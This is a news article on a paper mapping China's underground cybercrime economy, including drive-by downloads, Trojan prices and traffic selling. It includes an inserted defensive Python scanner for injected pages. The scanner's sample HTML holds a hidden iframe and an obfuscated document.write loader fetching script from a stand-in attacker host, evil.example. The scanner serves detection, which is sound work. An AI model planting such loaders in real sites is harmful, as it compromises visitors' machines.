Researchers map China's underground cybercrime economy

Researchers from Peking University in Beijing and the University of Mannheim in Germany released a paper that aims to map the underground cybercrime economy in China.
Written by Larry Dignan, Contributor on

Researchers from Peking University in Beijing and the University of Mannheim in Germany released a paper this week that aims to map the underground cybercrime economy in China.

The paper concludes that 1.49 percent of the 145,000 most popular sites in China “contain some kind of malicious content.”

While the Internet boom in China is impressive, the researchers note that “there is also the other side of the coin: targeting the virtual assets owned by the normal Chinese Internet users, malicious attackers, so called blackhats, discover the Web as a new venue for making money by exploiting innocent users.”

The researchers outline the most common attack:
"A common theme is to inject malicious code into a bought or cracked Web site. The injected code exploits an unpatched client-side vulnerability within the visiting Web-browser or related application. Each time a user with a vulnerable version of a browser or related application visits this site, his machine is compromised and some kind of malware is automatically installed. This kind of attack is also called drive-by-download attack. The malware is quite often some kind of Trojan Horse that searches for valuable information on the victim’s machine and then sends the information back to the attacker, who in turn can sell this virtual good to other attackers or innocent users.”
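The quoted passage describes the injection side of a drive-by download: a bought or cracked site carries a hidden loader that pulls exploit code from an attacker-controlled host, and (as the traffic-selling bullet further down notes) visitors are often bounced through a redirect first. As an added example, not code from the paper or from this article, the following heuristic scanner flags the usual symptoms of such an injection in a page's HTML: hidden or cross-host iframes, inline scripts built from `document.write`/`unescape`/`eval`, and meta-refresh redirects to another host. The page URLs, hostnames and HTML samples are constructed for illustration; the rules are deliberately simple and will miss anything better obfuscated.

```python
"""Heuristic scan for drive-by-download injection patterns in HTML.

Added example; the sample pages and hosts below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline CSS commonly used to keep an injected iframe out of sight.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|left\s*:\s*-\d{3,}", re.I)
# Typical building blocks of an obfuscated inline loader.
OBFUSCATION = re.compile(
    r"document\.write|unescape\(|String\.fromCharCode|eval\(", re.I)
# <meta http-equiv="refresh" content="0; url=...">
META_REFRESH = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*(.+)$", re.I)


def _tiny(value):
    """True for a width/height attribute of 0 or 1 pixel."""
    if value is None:
        return False
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


class DriveByScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing one page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_host = urlparse(page_url).hostname
        self.findings = []
        self._in_script = False

    def _external(self, src):
        # Relative URLs have no hostname and are treated as same-site.
        host = urlparse(src or "").hostname
        return host is not None and host != self.page_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            src = a.get("src") or ""
            style = a.get("style") or ""
            hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                      or HIDDEN_STYLE.search(style) is not None)
            if hidden:
                self.findings.append(("hidden-iframe", src))
            elif self._external(src):
                self.findings.append(("external-iframe", src))
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src and self._external(src):
                self.findings.append(("external-script", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH.match(a.get("content") or "")
            if m:
                target = m.group(1).strip().strip("'\"")
                if self._external(target):
                    self.findings.append(("meta-refresh", target))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands over <script> bodies as data.
        if self._in_script and OBFUSCATION.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan(page_url, html):
    """Return the list of (kind, detail) findings for one page."""
    parser = DriveByScanner(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample pages: a clean page, an injected "free movies" page
# and a traffic-selling page that simply redirects visitors elsewhere.
CLEAN = """<html><body><h1>Welcome</h1>
<script src="/js/site.js"></script></body></html>"""

INJECTED = """<html><body><h1>Free movies</h1>
<iframe src="http://evil.example/x.htm" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://evil.example/e.js%22%3E%3C/script%3E'));</script>
</body></html>"""

REDIRECT = """<html><head>
<meta http-equiv="refresh" content="0; url=http://evil.example/landing.htm">
</head></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("injected", INJECTED), ("redirect", REDIRECT)):
        print(name, scan("http://shop.example/", page))
```

A real crawler would also resolve the iframe and script targets and inspect what they serve, since the loader itself is usually benign-looking; the paper's approach of running suspect pages through a client honeypot is the authoritative check, and this scan is only a cheap pre-filter.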

Meanwhile, anti-virus software simply cannot keep up with these threats, according to the researchers.

More interesting, however, is the paper’s attempt to map China’s underground hacking economy and identify the key players. These players are not specific to China per se, but are worth noting.

A few takeaways from the report:

  • “The market price of a Trojan is between tens and thousands of Renminbi (RMB), and a package of 0-day powerful Trojan generator and evasion service can be up to several tens of thousands of RMB. 10 RMB is as of November 2007 equivalent to US$1.34.”
  • “The administrators of certain personal Web sites attract visitors with the help of free goodies, e.g., free movies, music, software, or tools. These Web sites often betray their visitors: they sell the traffic (i.e., Web site visits) of their Web sites to Envelopes Stealers (people that buy traffic and malware) by hosting the Web-based Trojans. This means that innocent Web site visitors are redirected via these malicious Web sites to other sites that then attack the victims. If the attack is successful, a piece of malware is installed on the victim’s machine.” The going rate: 40 to 60 RMB per 10,000 IP visits.
  • Gamers are the linchpin of China’s underground economy. They are the primary victims of virtual asset theft (in-game powers and virtual currency), and they are also the buyers: without their demand for cheap virtual goods, hackers would not have much to sell.
  • Bulletin boards are the communications tool of choice. Specifically, Baidu’s bulletin board is popular with hackers. “One of the most prominent places for such markets within China is the Baidu Post Bar, the largest bulletin board community in China but with weak administration. Advertisements can be commonly found on several pertinent post bars at the site post.baidu.com. This system has a keyword-based structure, and there are no other entries to the post bar: if you do not know the keyword to search for, you will not find any malicious entries. The actors within the black market have their own, unique jargon, and thus it is hard for an outsider to find any information about this threat. The actual trading of virtual assets happens on public market places like Taobao. These very common online business platforms within the WWW are used by the cyber criminals to advertise and sell their goods. After a trade was successful and a Player has bought a virtual good, the money is sent commonly via Alipay.”

This article was originally a blog post on ZDNet.com.